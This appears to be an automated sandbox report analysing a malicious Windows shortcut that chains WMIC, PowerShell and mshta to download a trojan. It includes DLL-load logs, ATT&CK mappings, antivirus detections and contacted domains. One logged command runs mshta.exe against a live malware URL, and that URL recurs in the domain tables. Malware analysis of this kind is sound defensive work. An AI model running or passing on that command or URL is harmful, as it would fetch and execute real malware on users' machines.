Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: h0UP1BcPk5.lnkLNK file: ..\..\..\Windows\System32\Wbem\wmic.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000005.00000002.3260581593.0000028C65BB8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3260581593.0000028C65C5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3260581593.0000028C65C3C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3259548931.0000028C61BF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3260719411.0000028C65CDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3257942443.000002845F11A000.00000004.00000020.00020000.00000000.sdmp, powersearch[1].5.dr
Source: Binary string: sethc.pdb source: mshta.exe, 00000005.00000002.3260581593.0000028C65BB8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3260581593.0000028C65C5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3259548931.0000028C61BF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3260719411.0000028C65CDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3257942443.000002845F11A000.00000004.00000020.00020000.00000000.sdmp, powersearch[1].5.dr
Source: powersearch[1].5.drStatic PE information: 0x9EF0B9FD [Thu Jul 2 03:39:41 2054 UTC]
Source: powersearch[1].5.drStatic PE information: real checksum: 0x1f27b should be: 0x79dc3
Source: powersearch[1].5.drStatic PE information: section name: .didat

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Creates processes via WMI
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\powersearch[1]Jump to dropped file
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\powersearch[1]Jump to dropped file
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1799Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 654Jump to behavior
Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\powersearch[1]Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 616Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6348Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: mshta.exe, 00000005.00000002.3257942443.000002845F0A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3257942443.000002845F090000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3257942443.000002845F110000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3258400421.000001AB55A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3259682692.000001AB5B05A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\mshta.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://nins.in/cembra/power/powersearchJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
Windows Management Instrumentation		1
DLL Side-Loading		11
Process Injection		21
Masquerading		OS Credential Dumping111
Security Software Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Disable or Modify Tools		LSASS Memory11
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
Virtualization/Sandbox Evasion		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Timestomp		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials23
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570896 Sample: h0UP1BcPk5.lnk Startdate: 08/12/2024 Architecture: WINDOWS Score: 96 27 nins.in 2->27 33 Antivirus detection for URL or domain 2->33 35 Windows shortcut file (LNK) starts blacklisted processes 2->35 37 Multi AV Scanner detection for dropped file 2->37 39 5 other signatures 2->39 8 WMIC.exe 1 2->8         started        11 svchost.exe 1 1 2->11         started        signatures3 process4 dnsIp5 41 Contains functionality to create processes via WMI 8->41 43 Creates processes via WMI 8->43 14 powershell.exe 7 8->14         started        17 conhost.exe 1 8->17         started        31 127.0.0.1 unknown unknown 11->31 signatures6 process7 signatures8 45 Windows shortcut file (LNK) starts blacklisted processes 14->45 19 mshta.exe 21 14->19         started        23 conhost.exe 14->23         started        process9 dnsIp10 29 nins.in 216.10.240.70, 443, 49704 PUBLIC-DOMAIN-REGISTRYUS India 19->29 25 C:\Users\user\AppData\...\powersearch[1], PE32 19->25 dropped file11

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
h0UP1BcPk5.lnk16%ReversingLabsShortcut.Trojan.Cross

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\powersearch[1]21%ReversingLabsWin32.Trojan.Midie

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
nins.in0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://nins.in/cembra/power/powersearch...M0%Avira URL Cloudsafe
https://nins.in/cembra/power/powersearchogramFil0%Avira URL Cloudsafe
https://nins.in/cembra/power/powersearchon0%Avira URL Cloudsafe
https://nins.in/cembra/power/powersearchk0%Avira URL Cloudsafe
https://nins.in/cembra/power/powersearch...100%Avira URL Cloudmalware
https://nins.in/cembra/power/powersearch%0%Avira URL Cloudsafe
https://nins.in/cembra/power/powersearch...U0%Avira URL Cloudsafe
https://nins.in/cembra/power/powersearchmE0%Avira URL Cloudsafe
https://nins.in/cembra/power/powersearchsRZ0%Avira URL Cloudsafe
https://nins.in/cembra/power/powersearchuserLOZOrc00%Avira URL Cloudsafe
https://nins.in/cembra/power/powersearchHu0%Avira URL Cloudsafe
https://nins.in/cembra/power/powersearch100%Avira URL Cloudmalware
https://nins.in/cembra/power/powersearchRelPath=0%Avira URL Cloudsafe
https://nins.in/cembra/power/powersearchH0%Avira URL Cloudsafe
https://nins.in/cembra/power/powersearchG0%Avira URL Cloudsafe
https://nins.in/cembra/power/powersearch...50%Avira URL Cloudsafe
https://nins.in/cembra/power/powersearchNK0%Avira URL Cloudsafe
https://nins.in/cembra/power/powersearchhttps://nins.in/cembra/power/powersearch0%Avira URL Cloudsafe
https://nins.in/0%Avira URL Cloudsafe
https://nins.in/cembra/power/powersearchC:0%Avira URL Cloudsafe
https://nins.in/cembra/power/powersearch$global:?0%Avira URL Cloudsafe
https://nins.in/cembra/power/powersearch0;0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
nins.in
216.10.240.70
truetrueunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://nins.in/cembra/power/powersearchtrue
  • Avira URL Cloud: malware
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://nins.in/cembra/power/powersearch...Mmshta.exe, 00000005.00000002.3259548931.0000028C61BF2000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://nins.in/cembra/power/powersearchkmshta.exe, 00000005.00000002.3257942443.000002845F090000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://nins.in/cembra/power/powersearchonmshta.exe, 00000005.00000002.3258533390.0000028C60E6C000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://nins.in/cembra/power/powersearch...mshta.exe, 00000005.00000002.3259548931.0000028C61BF2000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: malware
unknown
https://nins.in/cembra/power/powersearchogramFilWMIC.exe, 00000000.00000002.2022963351.000002055E3F0000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://nins.in/cembra/power/powersearch%mshta.exe, 00000005.00000002.3257942443.000002845F0A6000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://nins.in/cembra/power/powersearch...Umshta.exe, 00000005.00000002.3259548931.0000028C61BF2000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://nins.in/cembra/power/powersearchmEmshta.exe, 00000005.00000002.3259548931.0000028C61BF2000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://crl.ver)svchost.exe, 00000006.00000002.3259551817.000001AB5B000000.00000004.00000020.00020000.00000000.sdmpfalse
    		high
    https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000006.00000003.2101858618.000001AB5AE70000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drfalse
      		high
      https://nins.in/cembra/power/powersearchsRZmshta.exe, 00000005.00000002.3257942443.000002845F059000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
